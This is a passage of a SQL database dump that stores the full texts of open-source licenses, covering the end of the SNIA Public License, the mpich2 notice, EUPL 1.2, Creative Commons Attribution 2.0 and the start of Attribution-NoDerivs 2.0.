published under a particular\nversion of the License, You may always continue to use it under the terms\nof that version. You may also choose to use such Covered Code under the terms\nof any subsequent version of the License published by the SNIA. No one other\nthan the SNIA has the right to modify the terms applicable to Covered Code\ncreated under this License.\n\n6.3 Derivative Works. If You create or use a modified version of this License\n(which you may only do in order to apply it to code which is not already Covered\nCode governed by this License), You must (a) rename Your license so that the\nphrases \"Storage Networking Industry Association,\" \"SNIA,\" or any confusingly\nsimilar phrase do not appear in your license (except to note that your license\ndiffers from this License) and (b) otherwise make it clear that Your version\nof the license contains terms which differ from the SNIA Public License. (Filling\nin the name of the Initial Developer, Original Code or Contributor in the\nnotice described in Exhibit A shall not of themselves be deemed to be modifications\nof this License.)\n\n7. DISCLAIMER OF WARRANTY. COVERED CODE IS PROVIDED UNDER THIS LICENSE ON\nAN \"AS IS\" BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED,\nINCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE COVERED CODE IS FREE OF\nDEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE OR NON-INFRINGING. THE\nENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE COVERED CODE IS WITH\nYOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE\nINITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY\nSERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN\nESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER\nEXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\n8.1 This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\na reasonable time after becoming aware of the breach. All sublicenses to the\nCovered Code which are properly granted shall survive any termination of this\nLicense. Provisions which, by their nature, must remain in effect beyond the\ntermination of this License shall survive.\n\n8.2 If You initiate litigation by asserting a patent infringement claim (excluding\ndeclaratory judgment actions) against Initial Developer or a Contributor (the\nInitial Developer or Contributor against whom You file such action is referred\nto as \"Participant\") alleging that: o (a) such Participant\'s Contributor Version\ndirectly or indirectly infringes any patent, then any and all rights granted\nby such Participant to You under Sections 2.1 and/or 2.2 of this License shall,\nupon 60 days notice from Participant terminate prospectively, unless if within\n60 days after receipt of notice You either: (i) agree in writing to pay Participant\na mutually agreeable reasonable royalty for Your past and future use of Modifications\nmade by such Participant, or (ii) withdraw Your litigation claim with respect\nto the Contributor Version against such Participant. If within 60 days of\nnotice, a reasonable royalty and payment arrangement are not mutually agreed\nupon in writing by the parties or the litigation claim is not withdrawn, the\nrights granted by Participant to You under Sections 2.1 and/or 2.2 automatically\nterminate at the expiration of the 60 day notice period specified above.\n\n8.3 If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4 In the event of termination under Sections 8.1 or 8.2 above, all end user\nlicense agreements (excluding distributors and resellers) which have been\nvalidly granted by You or any distributor hereunder prior to termination shall\nsurvive termination.\n\n9. LIMITATION OF LIABILITY. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY,\nWHETHER TORT (INCLUDING NEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE\nINITIAL DEVELOPER, ANY OTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE,\nOR ANY SUPPLIER OF ANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT,\nSPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING,\nWITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER\nFAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES,\nEVEN IF SUCH PARTY SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES.\nTHIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL\nINJURY RESULTING FROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW\nPROHIBITS SUCH LIMITATION. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR\nLIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION\nMAY NOT APPLY TO YOU.\n\n10. U.S. GOVERNMENT END USERS. The Covered Code is a \"commercial item,\" as\nthat term is defined in 48 C.F.R. 2.101 (Oct. 1995), consisting of \"commercial\ncomputer software\" and \"commercial computer software documentation,\" as such\nterms are used in 48 C.F.R. 12.212 (Sept. 1995). Consistent with 48 C.F.R.\n12.212 and 48 C.F.R. 227.7202-1 through 227.7202-4 (June 1995), all U.S. Government\nEnd Users acquire Covered Code with only those rights set forth herein.\n\n11. MISCELLANEOUS This License represents the complete agreement concerning\nsubject matter hereof. If any provision of this License is held to be unenforceable,\nsuch provision shall be reformed only to the extent necessary to make it enforceable.\nThis License shall be governed by California law provisions (except to the\nextent applicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded. Any law or regulation\nwhich provides that the language of a contract shall be construed against\nthe drafter shall not apply to this License.\n\n12. RESPONSIBILITY FOR CLAIMS. As between Initial Developer and the Contributors,\neach party is responsible for claims and damages arising, directly or indirectly,\nout of its utilization of rights under this License and You agree to work\nwith Initial Developer and Contributors to distribute such responsibility\non an equitable basis. Nothing herein is intended or shall be deemed to constitute\nany admission of liability.\n\n13. MULTIPLE-LICENSED CODE. Initial Developer may designate portions of the\nCovered Code as \"Multiple-Licensed\". \"Multiple-Licensed\" means that the Initial\nDeveloper permits you to utilize portions of the Covered Code under Your choice\nof this License or the alternative licenses, if any, specified by the Initial\nDeveloper in the file described in Exhibit A.\n\n14. ACCEPTANCE. This License is accepted by You if You retain, use, or distribute\nthe Covered Code for any purpose. EXHIBIT A The SNIA Public License.\n\nThe contents of this file are subject to the SNIA Public License Version 1.0\n(the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nwww.snia.org/smi/developers/cim/\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is .\n\nThe Initial Developer of the Original Code is [COMPLETE THIS] .\n\nContributor(s): ______________________________________.\n\nRead more about this license at http://www.snia.org/smi/developers/open_source/\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(144,'mpich2','COPYRIGHT\n\nThe following is a notice of limited availability of the code, and disclaimer\nwhich must be included in the prologue of the code and in all source listings\nof the code.\n\nCopyright Notice\n\n+ 2002 University of Chicago\n\nPermission is hereby granted to use, reproduce, prepare derivative works,\nand to redistribute to others. This software was authored by:\n\nArgonne National Laboratory Group W. Gropp: (630) 252-4318; FAX: (630) 252-5986;\ne-mail: gropp@mcs.anl.gov E. Lusk: (630) 252-7852; FAX: (630) 252-5986; e-mail:\nlusk@mcs.anl.gov Mathematics and Computer Science Division Argonne National\nLaboratory, Argonne IL 60439\n\nGOVERNMENT LICENSE\n\nPortions of this material resulted from work developed under a U.S. Government\nContract and are subject to the following license: the Government is granted\nfor itself and others acting on its behalf a paid-up, nonexclusive, irrevocable\nworldwide license in this computer software to reproduce, prepare derivative\nworks, and perform publicly and display publicly.\n\nDISCLAIMER\n\nThis computer code material was prepared, in part, as an account of work sponsored\nby an agency of the United States Government. Neither the United States, nor\nthe University of Chicago, nor any of their employees, makes any warranty\nexpress or implied, or assumes any legal liability or responsibility for the\naccuracy, completeness, or usefulness of any information, apparatus, product,\nor process disclosed, or represents that its use would not infringe privately\nowned rights.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(145,'EUPL-1.2','European Union Public Licence v. 1.2\n\nEUPL © the European Union 2007, 2016\n\nThis European Union Public Licence (the \'EUPL\') applies to the Work (as defined\nbelow) which is provided under the terms of this Licence. Any use of the Work,\nother than as authorised under this Licence is prohibited (to the extent such\nuse is covered by a right of the copyright holder of the Work).\n\nThe Work is provided under the terms of this Licence when the Licensor (as\ndefined below) has placed the following notice immediately following the copyright\nnotice for the Work:\n\n \n\n Licensed under the EUPL\n\n \n\nor has expressed by any other means his willingness to license under the EUPL.\n\n 1. Definitions\n\n In this Licence, the following terms have the following meaning:\n\n — \'The Licence\': this Licence.\n\n— \'The Original Work\': the work or software distributed or communicated by\nthe Licensor under this Licence, available as Source Code and also as Executable\nCode as the case may be.\n\n— \'Derivative Works\': the works or software that could be created by the Licensee,\nbased upon the Original Work or modifications thereof. This Licence does not\ndefine the extent of modification or dependence on the Original Work required\nin order to classify a work as a Derivative Work; this extent is determined\nby copyright law applicable in the country mentioned in Article 15.\n\n — \'The Work\': the Original Work or its Derivative Works.\n\n— \'The Source Code\': the human-readable form of the Work which is the most\nconvenient for people to study and modify.\n\n— \'The Executable Code\': any code which has generally been compiled and which\nis meant to be interpreted by a computer as a program.\n\n— \'The Licensor\': the natural or legal person that distributes or communicates\nthe Work under the Licence.\n\n— \'Contributor(s)\': any natural or legal person who modifies the Work under\nthe Licence, or otherwise contributes to the creation of a Derivative Work.\n\n— \'The Licensee\' or \'You\': any natural or legal person who makes any usage\nof the Work under the terms of the Licence.\n\n— \'Distribution\' or \'Communication\': any act of selling, giving, lending,\nrenting, distributing, communicating, transmitting, or otherwise making available,\nonline or offline, copies of the Work or providing access to its essential\nfunctionalities at the disposal of any other natural or legal person.\n\n 2. Scope of the rights granted by the Licence\n\nThe Licensor hereby grants You a worldwide, royalty-free, non-exclusive, sublicensable\nlicence to do the following, for the duration of copyright vested in the Original\nWork:\n\n — use the Work in any circumstance and for all usage,\n\n — reproduce the Work,\n\n — modify the Work, and make Derivative Works based upon the Work,\n\n— communicate to the public, including the right to make available or display\nthe Work or copies thereof to the public and perform publicly, as the case\nmay be, the Work,\n\n — distribute the Work or copies thereof,\n\n — lend and rent the Work or copies thereof,\n\n — sublicense rights in the Work or copies thereof.\n\nThose rights can be exercised on any media, supports and formats, whether\nnow known or later invented, as far as the applicable law permits so.\n\nIn the countries where moral rights apply, the Licensor waives his right to\nexercise his moral right to the extent allowed by law in order to make effective\nthe licence of the economic rights here above listed.\n\nThe Licensor grants to the Licensee royalty-free, non-exclusive usage rights\nto any patents held by the Licensor, to the extent necessary to make use of\nthe rights granted on the Work under this Licence.\n\n 3. Communication of the Source Code\n\nThe Licensor may provide the Work either in its Source Code form, or as Executable\nCode. If the Work is provided as Executable Code, the Licensor provides in\naddition a machine-readable copy of the Source Code of the Work along with\neach copy of the Work that the Licensor distributes or indicates, in a notice\nfollowing the copyright notice attached to the Work, a repository where the\nSource Code is easily and freely accessible for as long as the Licensor continues\nto distribute or communicate the Work.\n\n 4. Limitations on copyright\n\nNothing in this Licence is intended to deprive the Licensee of the benefits\nfrom any exception or limitation to the exclusive rights of the rights owners\nin the Work, of the exhaustion of those rights or of other applicable limitations\nthereto.\n\n 5. Obligations of the Licensee\n\nThe grant of the rights mentioned above is subject to some restrictions and\nobligations imposed on the Licensee. Those obligations are the following:\n\nAttribution right: The Licensee shall keep intact all copyright, patent or\ntrademarks notices and all notices that refer to the Licence and to the disclaimer\nof warranties. The Licensee must include a copy of such notices and a copy\nof the Licence with every copy of the Work he/she distributes or communicates.\nThe Licensee must cause any Derivative Work to carry prominent notices stating\nthat the Work has been modified and the date of modification.\n\nCopyleft clause: If the Licensee distributes or communicates copies of the\nOriginal Works or Derivative Works, this Distribution or Communication will\nbe done under the terms of this Licence or of a later version of this Licence\nunless the Original Work is expressly distributed only under this version\nof the Licence — for example by communicating \'EUPL v. 1.2 only\'. The Licensee\n(becoming Licensor) cannot offer or impose any additional terms or conditions\non the Work or Derivative Work that alter or restrict the terms of the Licence.\n\nCompatibility clause: If the Licensee Distributes or Communicates Derivative\nWorks or copies thereof based upon both the Work and another work licensed\nunder a Compatible Licence, this Distribution or Communication can be done\nunder the terms of this Compatible Licence. For the sake of this clause, \'Compatible\nLicence\' refers to the licences listed in the appendix attached to this Licence.\nShould the Licensee\'s obligations under the Compatible Licence conflict with\nhis/her obligations under this Licence, the obligations of the Compatible\nLicence shall prevail.\n\nProvision of Source Code: When distributing or communicating copies of the\nWork, the Licensee will provide a machine-readable copy of the Source Code\nor indicate a repository where this Source will be easily and freely available\nfor as long as the Licensee continues to distribute or communicate the Work.\n\nLegal Protection: This Licence does not grant permission to use the trade\nnames, trademarks, service marks, or names of the Licensor, except as required\nfor reasonable and customary use in describing the origin of the Work and\nreproducing the content of the copyright notice.\n\n 6. Chain of Authorship\n\nThe original Licensor warrants that the copyright in the Original Work granted\nhereunder is owned by him/her or licensed to him/her and that he/she has the\npower and authority to grant the Licence.\n\nEach Contributor warrants that the copyright in the modifications he/she brings\nto the Work are owned by him/her or licensed to him/her and that he/she has\nthe power and authority to grant the Licence.\n\nEach time You accept the Licence, the original Licensor and subsequent Contributors\ngrant You a licence to their contributions to the Work, under the terms of\nthis Licence.\n\n 7. Disclaimer of Warranty\n\nThe Work is a work in progress, which is continuously improved by numerous\nContributors. It is not a finished work and may therefore contain defects\nor \'bugs\' inherent to this type of development.\n\nFor the above reason, the Work is provided under the Licence on an \'as is\'\nbasis and without warranties of any kind concerning the Work, including without\nlimitation merchantability, fitness for a particular purpose, absence of defects\nor errors, accuracy, non-infringement of intellectual property rights other\nthan copyright as stated in Article 6 of this Licence.\n\nThis disclaimer of warranty is an essential part of the Licence and a condition\nfor the grant of any rights to the Work.\n\n 8. Disclaimer of Liability\n\nExcept in the cases of wilful misconduct or damages directly caused to natural\npersons, the Licensor will in no event be liable for any direct or indirect,\nmaterial or moral, damages of any kind, arising out of the Licence or of the\nuse of the Work, including without limitation, damages for loss of goodwill,\nwork stoppage, computer failure or malfunction, loss of data or any commercial\ndamage, even if the Licensor has been advised of the possibility of such damage.\nHowever, the Licensor will be liable under statutory product liability laws\nas far such laws apply to the Work.\n\n 9. Additional agreements\n\nWhile distributing the Work, You may choose to conclude an additional agreement,\ndefining obligations or services consistent with this Licence. However, if\naccepting obligations, You may act only on your own behalf and on your sole\nresponsibility, not on behalf of the original Licensor or any other Contributor,\nand only if You agree to indemnify, defend, and hold each Contributor harmless\nfor any liability incurred by, or claims asserted against such Contributor\nby the fact You have accepted any warranty or additional liability.\n\n 10. Acceptance of the Licence\n\nThe provisions of this Licence can be accepted by clicking on an icon \'I agree\'\nplaced under the bottom of a window displaying the text of this Licence or\nby affirming consent in any other similar way, in accordance with the rules\nof applicable law. Clicking on that icon indicates your clear and irrevocable\nacceptance of this Licence and all of its terms and conditions.\n\nSimilarly, you irrevocably accept this Licence and all of its terms and conditions\nby exercising any rights granted to You by Article 2 of this Licence, such\nas the use of the Work, the creation by You of a Derivative Work or the Distribution\nor Communication by You of the Work or copies thereof.\n\n 11. Information to the public\n\nIn case of any Distribution or Communication of the Work by means of electronic\ncommunication by You (for example, by offering to download the Work from a\nremote location) the distribution channel or media (for example, a website)\nmust at least provide to the public the information requested by the applicable\nlaw regarding the Licensor, the Licence and the way it may be accessible,\nconcluded, stored and reproduced by the Licensee.\n\n 12. Termination of the Licence\n\nThe Licence and the rights granted hereunder will terminate automatically\nupon any breach by the Licensee of the terms of the Licence.\n\nSuch a termination will not terminate the licences of any person who has received\nthe Work from the Licensee under the Licence, provided such persons remain\nin full compliance with the Licence.\n\n 13. Miscellaneous\n\nWithout prejudice of Article 9 above, the Licence represents the complete\nagreement between the Parties as to the Work.\n\nIf any provision of the Licence is invalid or unenforceable under applicable\nlaw, this will not affect the validity or enforceability of the Licence as\na whole. Such provision will be construed or reformed so as necessary to make\nit valid and enforceable.\n\nThe European Commission may publish other linguistic versions or new versions\nof this Licence or updated versions of the Appendix, so far this is required\nand reasonable, without reducing the scope of the rights granted by the Licence.\nNew versions of the Licence will be published with a unique version number.\n\nAll linguistic versions of this Licence, approved by the European Commission,\nhave identical value. Parties can take advantage of the linguistic version\nof their choice.\n\n 14. Jurisdiction\n\n Without prejudice to specific agreement between parties,\n\n— any litigation resulting from the interpretation of this License, arising\nbetween the European Union institutions, bodies, offices or agencies, as a\nLicensor, and any Licensee, will be subject to the jurisdiction of the Court\nof Justice of the European Union, as laid down in article 272 of the Treaty\non the Functioning of the European Union,\n\n— any litigation arising between other parties and resulting from the interpretation\nof this License, will be subject to the exclusive jurisdiction of the competent\ncourt where the Licensor resides or conducts its primary business.\n\n 15. Applicable Law\n\n Without prejudice to specific agreement between parties,\n\n— this Licence shall be governed by the law of the European Union Member State\nwhere the Licensor has his seat, resides or has his registered office,\n\n— this licence shall be governed by Belgian law if the Licensor has no seat,\nresidence or registered office inside a European Union Member State.\n\nAppendix\n\n\'Compatible Licences\' according to Article 5 EUPL are:\n\n — GNU General Public License (GPL) v. 2, v. 3\n\n — GNU Affero General Public License (AGPL) v. 3\n\n — Open Software License (OSL) v. 2.1, v. 3.0\n\n — Eclipse Public License (EPL) v. 1.0\n\n — CeCILL v. 2.0, v. 2.1\n\n — Mozilla Public Licence (MPL) v. 2\n\n — GNU Lesser General Public Licence (LGPL) v. 2.1, v. 3\n\n— Creative Commons Attribution-ShareAlike v. 3.0 Unported (CC BY-SA 3.0) for\nworks other than software\n\n — European Union Public Licence (EUPL) v. 1.1, v. 1.2\n\n— Québec Free and Open-Source Licence — Reciprocity (LiLiQ-R) or Strong Reciprocity\n(LiLiQ-R+).\n\nThe European Commission may update this Appendix to later versions of the\nabove licences without producing a new version of the EUPL, as long as they\nprovide the rights granted in Article 2 of this Licence and protect the covered\nSource Code from exclusive appropriation.\n\nAll other changes or additions to this Appendix require the production of\na new EUPL version.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(146,'CC-BY-2.0','Creative Commons Attribution 2.0 CREATIVE COMMONS CORPORATION IS NOT A LAW\nFIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE DOES\nNOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS\nINFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES REGARDING\nTHE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM\nITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\nFor the avoidance of doubt, where the Work is a musical composition or sound\nrecording, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered a Derivative Work for the purpose of\nthis License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\n b. to create and reproduce Derivative Works;\n\nc. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nd. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission Derivative Works.\n\n e. For the avoidance of doubt, where the work is a musical composition:\n\ni. Performance Royalties Under Blanket Licenses. Licensor waives the exclusive\nright to collect, whether individually or via a performance rights society\n(e.g. ASCAP, BMI, SESAC), royalties for the public performance or public digital\nperformance (e.g. webcast) of the Work.\n\nii. Mechanical Rights and Statutory Royalties. Licensor waives the exclusive\nright to collect, whether individually or via a music rights agency or designated\nagent (e.g. Harry Fox Agency), royalties for any phonorecord You create from\nthe Work (\"cover version\") and distribute, subject to the compulsory license\ncreated by 17 USC Section 115 of the US Copyright Act (or the equivalent in\nother jurisdictions).\n\nf. Webcasting Rights and Statutory Royalties. For the avoidance of doubt,\nwhere the Work is a sound recording, Licensor waives the exclusive right to\ncollect, whether individually or via a performance-rights society (e.g. SoundExchange),\nroyalties for the public digital performance (e.g. webcast) of the Work, subject\nto the compulsory license created by 17 USC Section 114 of the US Copyright\nAct (or the equivalent in other jurisdictions).\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested. If You create a Derivative Work, upon notice from any\nLicensor You must, to the extent practicable, remove from the Derivative Work\nany reference to such Licensor or the Original Author, as requested.\n\nb. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Derivative Works or Collective Works, You must keep\nintact all copyright notices for the Work and give the Original Author credit\nreasonable to the medium or means You are utilizing by conveying the name\n(or pseudonym if applicable) of the Original Author if supplied; the title\nof the Work if supplied; to the extent reasonably practicable, the Uniform\nResource Identifier, if any, that Licensor specifies to be associated with\nthe Work, unless such URI does not refer to the copyright notice or licensing\ninformation for the Work; and in the case of a Derivative Work, a credit identifying\nthe use of the Work in the Derivative Work (e.g., \"French translation of the\nWork by Original Author,\" or \"Screenplay based on original Work by Original\nAuthor\"). Such credit may be implemented in any reasonable manner; provided,\nhowever, that in the case of a Derivative Work or Collective Work, at a minimum\nsuch credit will appear where any other comparable authorship credit appears\nand in a manner at least as prominent as such other comparable authorship\ncredit.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Derivative Works or Collective Works from You under this\nLicense, however, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. Each time You distribute or publicly digitally perform a Derivative Work,\nLicensor offers to the recipient a license to the original Work on the same\nterms and conditions as the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(147,'CC-BY-ND-2.0','Creative Commons Attribution-NoDerivs 2.0 CREATIVE COMMONS CORPORATION IS\nNOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE\nDOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES\nTHIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered 